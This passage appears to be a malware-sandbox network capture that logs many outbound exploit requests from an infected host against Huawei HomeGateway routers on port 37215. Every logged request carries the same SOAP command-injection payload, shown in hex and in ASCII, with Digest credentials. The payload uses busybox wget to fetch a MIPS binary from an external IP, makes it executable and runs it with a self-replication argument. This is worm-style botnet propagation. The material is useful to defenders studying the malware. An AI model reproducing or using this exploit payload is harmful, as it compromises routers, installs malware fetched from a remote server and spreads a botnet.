                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        813192.168.2.2347026197.63.241.24837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483001947 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        814192.168.2.2360128157.153.222.8737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483026981 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        815192.168.2.2357396197.134.89.13437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483038902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        816192.168.2.2336708140.97.228.16337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483038902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        817192.168.2.235653048.122.233.3237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483047009 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        818192.168.2.235834691.40.199.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483047009 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        819192.168.2.2333070157.61.226.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483047009 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        820192.168.2.2360190197.196.193.2237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483062029 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        821192.168.2.234652041.95.36.17137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487858057 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        822192.168.2.2348016197.76.7.24637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487864971 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
